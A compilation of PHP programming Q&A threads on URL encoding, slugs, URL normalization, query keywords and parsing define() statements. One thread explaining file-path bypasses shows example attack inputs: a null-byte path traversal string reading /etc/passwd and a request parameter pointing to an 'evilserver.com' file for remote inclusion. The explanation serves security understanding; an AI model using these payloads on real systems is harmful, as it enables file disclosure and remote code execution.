Special characters in CakePHP URL - php

I'm developing a web application where users have profiles, and skills related to that profile. I want to develop a page where a user can see all profiles that correspond to a particular skill. For example, if I wanted to see all users with the skill of "HTML" I could use http://site.com/skills/HTML. Pretty simple.
I've got it working, however some users have skills with spaces (for example project management) and some have special characters (for example C#). When I browse to a URL like http://site.com/skills/C#, Cake automatically makes it http://site.com/skills/C because it parses out the special character (# in this case).
How can I safely allow skills in the URL that have special characters in them? This is the action I'm currently using:
public function view($name) {
    // Find skill using $name
    $skill = $this->Skill->find('first', array(
        'conditions' => array('Skill.name' => $name)
    ));
    if (!$skill) {
        // Skill doesn't exist, return 404
        // TODO: route to 404 page
        throw new NotFoundException();
    }
    $this->set('skill', $skill);
}

The # is a reserved character in URLs: it starts the fragment identifier (the part that jumps to a named anchor), and browsers never send the fragment to the server. That is why your action only receives C; Cake never sees the #. To use special characters in a URL, you need to encode them with urlencode() (or rawurlencode() for a path segment, which encodes a space as %20 rather than +) when you build the link.
But please note that your URLs will not look "fancy": each special character is percent-encoded, so C# becomes C%23. So you might want to consider a URL-friendly alias for your tag, like CSharp (you can store it in a separate database field and use it to look up the original value).
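As a minimal sketch of the encoding step described above, assuming the links are built by hand and the skill names are the ones from the question (the /skills/ prefix and the variable names are only illustrative):

```php
<?php
// Hypothetical skill names; only the encoding calls matter here.
$skills = ['HTML', 'C#', 'project management'];

$links = [];
foreach ($skills as $name) {
    // rawurlencode() percent-encodes a path segment (space => %20, # => %23).
    $links[$name] = '/skills/' . rawurlencode($name);
}

// rawurldecode() reverses the encoding.
$decoded = rawurldecode('C%23');
```

With this, the link for C# is /skills/C%23, so the # reaches the server instead of being treated as the start of a fragment.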

Related

Which special characters can cause a file path to be misinterpreted?

For example, there is function (pseudo code):
if ($_GET['path'] ENDS with .mp3 extension) { read($_GET['path']); }
But is it possible that an attacker could somehow use a special symbol or method, e.g.:
path=file.php^example.mp3
or
path=file.php+example.mp3
and so on...
Does PHP have some symbol after which everything is ignored, so that PHP would try to open file.php?
P.S. DON'T POST ANSWERS about PROTECTION! I NEED TO KNOW IF THIS CODE can be bypassed, as I AM TO REPORT MANY SCRIPTS for this issue (if this is really an issue).
"Does PHP have some symbol after which everything is ignored, so that PHP would try to open file.php?"
Yes, such a symbol exists; it is called the 'null byte' ("\0").
In C (the language the PHP engine is written in), the end of a string is signalled by a null byte, so a path handed down to the C-level file functions is cut off at the first null byte. Note that this affects older PHP versions: since PHP 5.3.4, the filesystem functions reject paths that contain a null byte.
If you want the string to end with .mp3 you should manually append it.
Having said that, it is, generally speaking, a very bad idea to accept a user supplied path from a security standpoint (and I believe you are interested in the security aspect of this, because you originally posted this question on security.SE).
Consider the situation where:
$_GET['path'] = "../../../../../etc/passwd\0.mp3";
or a variation on this theme.
The leading concept in programming is "Don't trust user input". So the main problem in your case is not a special character; it's how you work with your data. You shouldn't use a path given by a user, because the user can manipulate the path or other variables.
To escape user input before printing it, you can use htmlspecialchars, or you can filter your GET input with filter_input. Note that this only makes the value safe to output in HTML; it does not make it safe to use as a file path. Something like this:
$search_html = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
WE CAN'T TELL YOU IF THE CODE CAN BE "BYPASSED" BECAUSE YOU'VE NOT GIVEN US ANY PHP CODE
As to the question of whether it's possible to trick PHP into processing a file it shouldn't, based on the end of the string: only if there is another file somewhere else whose name has the same ending. However, by default (allow_url_fopen is enabled), PHP will happily read from URLs using the same functions it uses for reading local files. Consider:
http://yourserver.com/yourscript.php?path=http%3A%2F%2Fevilserver.com%2Fpwnd_php.txt%3Ffake_end%3Dmp3
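To make the point of these answers concrete, here is a small sketch of why a suffix test alone says little about what will be opened. The endsWithMp3() helper is a hypothetical stand-in for the pseudo-code check in the question, and the inputs are illustrative:

```php
<?php
// Hypothetical stand-in for the "ENDS with .mp3" check from the question.
function endsWithMp3(string $path): bool
{
    return substr($path, -4) === '.mp3';
}

$inputs = [
    'song.mp3',
    "file.php\0.mp3",                                   // null byte before the suffix
    'http://evilserver.com/pwnd_php.txt?fake_end=.mp3', // remote URL with a fake ending
];

$report = [];
foreach ($inputs as $path) {
    $report[] = [
        'passes_check'   => endsWithMp3($path),
        'has_null_byte'  => strpos($path, "\0") !== false,
        'looks_like_url' => (bool) preg_match('#^[a-z][a-z0-9+.-]*://#i', $path),
    ];
}
```

All three inputs pass the suffix check, although only the first one is an ordinary local .mp3 name.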

slugging friendly urls in php

I have a problem concerning PHP, MySQL, Apache's mod_rewrite and a slug function for friendly URLs.
I have a table in MySQL with series.
This table has an auto_increment ID and a unique key string that is the name of the series.
What I want to do is:
The user could write something like series/name-of-a-serie (because I would prefer to use the unique string rather than IDs in this case), and I would get something like series.php?serieName=name-of-a-serie, but the name I have in the database is "name of a serie".
So I was thinking about reverting the slugged string to get back the original... but then I have another problem:
If I have a function that replaces white space with hyphens, I would have problems with, for example, the string "this - name", because if I revert the process, I would get "this name" and that's not the original name.
Any ideas?
Thanks in advance, and sorry: I'm not a native English speaker and I can't express myself as well as I would like.
You could always use a second column in your database where you store an already cleaned-up version of the series name (special characters removed, spaces replaced with dashes, and so on).
When that link is used, you just have to look up that prepared text in the database to get the real entry.
As far as I know, WordPress does it exactly this way: it stores a URL-friendly post_name with every post.
By passing all URLs through a script (via .htaccess), it can check for all those variants and show the corresponding pages.
Please see How to rewrite urls in wordpress for some details.
Some code to clean up your titles might look like this:
// Define all the characters you want to get rid of / replace
$arrBadChars = array('Ä', 'Ö', 'Ü', 'ä', 'ö', 'ü', 'ß', ' ', '_', '~', '-/', chr(10), chr(13));
// define the corresponding characters/texts for the above ones
$arrGoodChars = array ('ae', 'oe', 'ue', 'ae', 'oe', 'ue', 'ss', '-', '', '/', '', '','');
// Replace the bad with the good ones
$strNewTitle = str_replace($arrBadChars, $arrGoodChars, html_entity_decode($strTitle));
// simply paranoia, to remove everything else you might not have thought of above...
$strNewTitle = preg_replace('#[^[:space:]~a-zA-Z0-9_-]#', '', $strNewTitle);
$strNewTitle is the value you could save and use for your URL.
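A more compact variant of the same idea, as a sketch only: the slugify() name and the small transliteration map are assumptions, and anything that is not a letter or digit after transliteration simply becomes a hyphen.

```php
<?php
// Hypothetical helper: turns a title into a lowercase, hyphen-separated slug.
function slugify(string $title): string
{
    // Transliterate a few German characters first (extend the map as needed).
    $map = [
        'Ä' => 'ae', 'Ö' => 'oe', 'Ü' => 'ue',
        'ä' => 'ae', 'ö' => 'oe', 'ü' => 'ue', 'ß' => 'ss',
    ];
    $slug = strtolower(strtr($title, $map));

    // Collapse every run of characters other than a-z and 0-9 into one hyphen.
    $slug = preg_replace('/[^a-z0-9]+/', '-', $slug);

    // Drop hyphens left over at the start or end.
    return trim($slug, '-');
}
```

Note that "this - name" and "this name" both end up as this-name, which is exactly why the slug has to be stored next to the original title rather than reversed.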
If you are sure that you won't have any - in the database title, simply do this:
$id = str_replace("-", " ", $_GET['id']);
$stm = $db->prepare("SELECT * FROM movie WHERE movie_title=:movie");
// execute() returns a boolean, so fetch from the statement afterwards
$stm->execute(array(":movie" => $id));
$result = $stm->fetchAll();
You can also use any other replacement character, like _ in the URL.
This way you can keep friendly URLs but also maintain your Database Titles. Another way which I have seen sometimes is to create a second database field which stores the URL.
The solution to this problem is to use numeric identifiers in the URL. You said the table already has an ID column, so it is easy to do. The basic concept is to extract the numeric ID from the URL, and then verify that the slug in the URL is equal to the slug in your database. If not, redirect to the correct one (301). This is the most popular pattern that I've seen.
Your URL will look like this:
http://example.com/12345/name-of-a-serie
How you get that ID is up to you, but mod_rewrite will work.
$id = $_GET['id'];
$slug = $_GET['slug'];
// verify the id
$record = getRecord($id);
if (!$record) {
    exit;
}
if ($record->slug != $slug) {
    $slug = $record->slug;
    // these values are NOT arbitrary, because we have validated the record
    // against the arbitrary ID first, so we're safe, as long as your
    // internal API is using prepared statements.
    // send a 301 (permanent) redirect to the canonical URL
    header("Location: /$id/$slug", true, 301);
    exit;
}
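If the whole path is handed to one PHP script instead of being split by mod_rewrite, the ID and slug could be extracted along these lines. This is a sketch: parseSeriesPath() is a hypothetical helper and the /ID/slug layout is the one from the example URL above.

```php
<?php
// Hypothetical helper: splits "/12345/name-of-a-serie" into its ID and slug.
// Returns null when the path does not have the expected shape.
function parseSeriesPath(string $path): ?array
{
    if (!preg_match('#^/(\d+)/([A-Za-z0-9-]+)/?$#', $path, $m)) {
        return null;
    }
    return ['id' => (int) $m[1], 'slug' => $m[2]];
}

$parsed = parseSeriesPath('/12345/name-of-a-serie');
```

The numeric ID is then the only value used for the lookup; the slug is compared against the stored one purely to decide whether to redirect.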
If you want to revert from a slugged string back to the original string, you have to ensure that the slugging function is bijective, then write the reverse function.
In practice, though, slugging functions can't be bijective, since they map an extended charset (the one of your language) to a restricted charset (the one used in URLs).
Fortunately, if the slug has a UNIQUE constraint in your table, you can use it in your PHP code as a key to retrieve your item, and thus its name.
Thank you very much.
I now have an idea of what I could do.
Every time I insert a new title into the DB, I would check the original name.
If there is already an entry, that means it is already in the DB.
If not, I would insert the original title and the slugged one.
In the case that "A serie" and "A-serie" were completely different series but the slugged title were the same
"A serie" -> "A-serie"
"A-serie" -> "A-serie"
then I would only have to change the slugged title, something like:
ID  | original name | slugged name
----------------------------------
201 | A name        | a-name
202 | A-name        | a-name1
The slugged name is the one that the user would write in the URL.
The URLs would be something like:
series/a-serie
series/a-serie1
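The numbering scheme described here could be sketched as follows. The uniqueSlug() helper is hypothetical, and the list of existing slugs is passed in as an array for illustration; in the real application it would come from the slug column.

```php
<?php
// Hypothetical helper: returns $base if it is free, otherwise $base with the
// first numeric suffix (1, 2, 3, ...) that is not taken yet.
function uniqueSlug(string $base, array $existingSlugs): string
{
    if (!in_array($base, $existingSlugs, true)) {
        return $base;
    }
    $n = 1;
    while (in_array($base . $n, $existingSlugs, true)) {
        $n++;
    }
    return $base . $n;
}
```

A UNIQUE index on the slug column is still worth having, since two concurrent inserts could otherwise pick the same suffix.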

Display if URL matches database characters

Let me first give you a little background to explain what I'm trying to do. My websites use URLs that look like this: MySite/World/Isthmus_of_Panama
I'm working on a major upgrade (and may eventually upgrade further by switching to a CMS, like Drupal or WordPress), and the general consensus seems to be that URLs with hyphens are better than URLs with underscores. So I'm changing my URLs to MySite/World/Isthmus-of-Panama. In the meantime, I'm also trying to figure out whether I should change my URLs to all lower case, and what to do about special symbols like accents or parentheses.
And what if someone typed in a URL that looks like MySite/World/Isthmus of Panama? Wikipedia has a script that automatically converts the spaces to underscores. It will also default to the correct URL if you use the wrong case.
Of course, if I change my URLs, I'll also have to forward visitors from my old URLs. It's getting very confusing.
Then I realized that I could cover all of the bases with a script that accepts any URL that matches the characters in my database, 1) regardless of case, and 2) regardless of whether multiple words are separated by hyphens, underscores, spaces or %20. So imagine the following URLs:
MySite/World/Isthmus-of-Panama
MySite/World/Isthmus of Panama
MySite/World/Isthmus%20of%20Panama
MySite/World/isthmus_of_panama
MySite/World/Isthmus-of_PANAMA
Where the database value is Isthmus-of-Panama.
Below is one of my queries, where $MyURL = the database value URL (e.g. Isthmus-of-Panama). Can anyone tell me how to modify it so that all of the above URLs will be accepted, with the page then defaulting to the database value?
Wikipedia has a similar feature. If you go to their article about Crazy Horse, then replace the URL Crazy_Horse with crazy_horse or Crazy Horse, it will default to Crazy_Horse. Thanks.
$sql = "SELECT COUNT(URL) AS num FROM gs_reference
    WHERE URL = :MyURL";
$stmt = $pdo->prepare($sql);
$stmt->bindParam(':MyURL', $MyURL, PDO::PARAM_STR);
$stmt->execute();
$Total = $stmt->fetch();
switch ($Total['num']) {
    case 1:
        // DISPLAY A PAGE
        break;
    case 0:
        // 404 NOT FOUND ERROR
        break;
    default:
        // DUPLICATE RESULTS
        break;
}
I would convert the input (for example Isthmus%20of%20Panama) to the database value in PHP.
If the converted value is equal to the input, display the page; otherwise do a 301 redirect to the URL with the converted text.
EDIT
I would create a slug column in the database (that is the usual name for it) which contains the normalized text (ASCII characters and -), and create a unique index on it.
You could use this function to generate the slug in PHP: PHP function to make slug (URL string)
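The conversion step might look like the sketch below. Both function names are hypothetical, and the canonical URLs are passed in as an array for illustration; with a real table you would more likely store the normalized key in an indexed column and query on it.

```php
<?php
// Hypothetical helper: reduces any accepted spelling to one comparison key.
function urlKey(string $raw): string
{
    $decoded = rawurldecode($raw);                                // %20 => space
    $hyphenated = preg_replace('/[\s_-]+/', '-', trim($decoded)); // unify separators
    return strtolower($hyphenated);                               // ignore case
}

// Hypothetical helper: returns the stored URL matching the request, or null.
function resolveCanonical(string $requested, array $canonicalUrls): ?string
{
    $wanted = urlKey($requested);
    foreach ($canonicalUrls as $canonical) {
        if (urlKey($canonical) === $wanted) {
            return $canonical;
        }
    }
    return null;
}
```

If resolveCanonical() returns a value that differs from the requested one, that is the case for the 301 redirect; if it returns null, that is the 404 case.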

Retrieving Multiple Words using PHP's $_GET function

I have a site that offers a keyword search. The user can perform a search by either selecting from a set of pre-defined keywords displayed as hyperlinks or utilize a search form on the same page.
When the user searches for Russian Blue Cat, the following is added to the page URL:
If using the pre-defined hyperlink search term, then ?keywords=Russian%20Blue%20Cat is added to the URL as follows:
http://mydomain.com/index.php?keywords=Russian%20Blue%20Cat
If using the search form, then ?keywords=Russian+Blue+Cat is added to the URL as follows:
http://mydomain.com/index.php?keywords=russian+blue+cat
The following $_GET line of code is placed within two PHP files: the original index.php file, which contains both the pre-defined hyperlink search terms and the search form, and another PHP file called process.php, which uses the keywords for another process.
if(empty($_GET['keywords'])){$keywords = '';} else {$keywords = $_GET['keywords'];}
The above $_GET line of code in the index.php file works properly and retrieves all three keywords. In this case the words Russian Blue Cat are retrieved.
The above $_GET line of code in the process.php file does not work properly and only retrieves the first of the three keywords. In this case only the word Russian is retrieved.
Is there a simple or proper way to fix this such that all keywords are retrieved properly?
Thank you in advance.
Check for the string '%20' and, if it is present, explode by '%20'. Otherwise, check for a plus sign and explode by that instead.
This method is agnostic of the differing input formats from the two sources entering the same script.
The caveat is that the string '%20' or the character '+' cannot occur inside a word in the other format, or you will get unusual behavior.
$keyword = array();
// compare with !== false: strpos() returns 0 (which is falsy) for a match at the start
if (strpos($keywords, "%20") !== false) {
    $keyword = explode("%20", $keywords);
} elseif (strpos($keywords, "+") !== false) {
    $keyword = explode("+", $keywords);
}
$keyword will then contain your keywords in an array.
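It may also help to know that PHP URL-decodes query parameters before filling $_GET, so %20 and + normally both arrive as plain spaces. The sketch below uses parse_str(), which applies the same decoding, to show this. The guess that process.php receives the keywords through a URL built without encoding is an assumption; the question does not show how process.php is called.

```php
<?php
// Both query-string spellings from the question decode to the same value.
parse_str('keywords=Russian%20Blue%20Cat', $fromLink);
parse_str('keywords=Russian+Blue+Cat', $fromForm);

// Split the decoded value on whitespace to get the individual words.
$words = preg_split('/\s+/', trim($fromLink['keywords']));

// When passing the keywords on to another script, encode them again.
$forwardUrl = 'process.php?' . http_build_query(['keywords' => $fromLink['keywords']]);
```

If the keywords are inserted into a link or header unencoded, everything after the first space can be lost, which would match the symptom of only Russian arriving.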

Read name and value from every define('NAME','VALUE'); inside a .php file

I'm implementing a PHP interface to process a .php file containing a bunch of define statements, which define constants whose text values are to be translated by somebody.
The input is parsed statement by statement and shown in the interface to the translator, who enters the translation in an HTML textarea and sends it to the server.
At the end of the process an output file would be generated, identical to the input .php file, only with the define values translated.
E.g. processing an input file 'eng.php' like this:
<?php
define ("SENTENCE_1", "A sentence to translate");
?>
would give the translated output file 'spa.php' like this:
<?php
define ("SENTENCE_1", "The same sentence translated to spanish");
?>
For this I would like to know:
What is the best way to parse the input file to get the constant names and values in an array? (Something like $var[0]['name'] would be "SENTENCE_1" and $var[0]['value'] would be "A sentence to translate")
Would it be possible to get the translation from google translator shown in the input textarea as a suggestion to edit for the person who is translating it? How? (I read google translator api v1 is no longer available and v2 is only available as a paid service. Are there any free alternatives?)
http://php.net/manual/es/function.get-defined-constants.php
What about that?
get_defined_constants doesn't give you exactly the structure you asked for, but it should be sufficient.
define('MY_CONSTANT', 'something');
define('MY_CONSTANT_2', 'another');
$constants = get_defined_constants(true);
$constants = $constants['user'];
print_r($constants);
/**
* array(
* 'MY_CONSTANT' => 'something',
* 'MY_CONSTANT_2' => 'another'
* )
*/
Note that this returns all user constants defined so far in the current request, not just those from one file.
Use get_defined_constants() to get the list of all the defined constants.
To get only the user-defined constants:
$allconstants = get_defined_constants(true);
print_r($allconstants['user']);
In case anybody needs to read constants' names and values defined in a given .php file into an array of variables without actually defining those constants (E.g. if some different constant with the same name was previously defined, thus giving an error when processing the file with include or require), here is how I did it (Warning: I haven't had any trouble yet, but it's not thoroughly tested, so it can be buggy).
$outconstants = array();
if (file_exists($filename)) {
    $outf = fopen($filename, 'r');
    while (($line = fgets($outf)) !== false) {
        if (strpos($line, 'define') !== false) {
            // hide escaped quotes (\' as \s, \" as \q), turn ' into ", then split on "
            $parts=explode("\"",implode("\"",explode("'",implode("\\q",explode("\\\"",implode("\\s",explode("\\'",$line)))))));
            // restore the escaped quotes inside the name and the value
            $name=implode("\\'",explode("\\s",implode("\\\"",explode("\\q",$parts[1]))));
            $value=implode("\\'",explode("\\s",implode("\\\"",explode("\\q",$parts[3]))));
            $outconstants[$name] = $value;
        }
    }
    fclose($outf);
}
As you can see, I assume there is no more than one define statement per line, and that the names and values of the constants are specified as string literals in PHP notation (between single (') or double (") quotes).
Also, escaped quotes (\" or \') are temporarily escaped as \q (\") or \s (\') instead, to properly match the non-escaped ones, and then escaped back as usual once what's in between the non escaped ones is assigned to $name and $value.
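An alternative sketch that does not depend on line layout uses PHP's tokenizer (token_get_all()) and returns the structure asked for in the question. The function names are hypothetical, it only recognizes define calls whose two arguments are plain string literals, and the unquoting of double-quoted strings is an approximation (no variable interpolation).

```php
<?php
// Turns a PHP string literal token (quotes included) into its value.
// Approximation: interpolation in double-quoted strings is not handled.
function unquotePhpLiteral(string $literal): string
{
    $body = substr($literal, 1, -1);
    if ($literal[0] === "'") {
        // Single-quoted strings only know the escapes \\ and \'.
        return strtr($body, ['\\\\' => '\\', "\\'" => "'"]);
    }
    return stripcslashes($body);
}

// Returns a list of ['name' => ..., 'value' => ...] for each define('X', 'y').
function parseDefines(string $source): array
{
    // Drop whitespace and comments so the tokens of a call are adjacent.
    $tokens = [];
    foreach (token_get_all($source) as $token) {
        $skip = is_array($token)
            && in_array($token[0], [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true);
        if (!$skip) {
            $tokens[] = $token;
        }
    }

    $isString = function ($t) {
        return is_array($t) && $t[0] === T_CONSTANT_ENCAPSED_STRING;
    };

    $defines = [];
    $count = count($tokens);
    for ($i = 0; $i + 5 < $count; $i++) {
        $t = $tokens[$i];
        if (is_array($t) && $t[0] === T_STRING && strtolower($t[1]) === 'define'
            && $tokens[$i + 1] === '('
            && $isString($tokens[$i + 2])
            && $tokens[$i + 3] === ','
            && $isString($tokens[$i + 4])
            && $tokens[$i + 5] === ')'
        ) {
            $defines[] = [
                'name'  => unquotePhpLiteral($tokens[$i + 2][1]),
                'value' => unquotePhpLiteral($tokens[$i + 4][1]),
            ];
        }
    }
    return $defines;
}
```

Calling parseDefines(file_get_contents($filename)) reads the file as text only, so nothing in it is actually defined or executed.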
The Google API problem was solved by using the Microsoft translation API instead (free up to 2,000,000 chars/month): http://msdn.microsoft.com/en-us/library/ff512421.aspx#phpexample
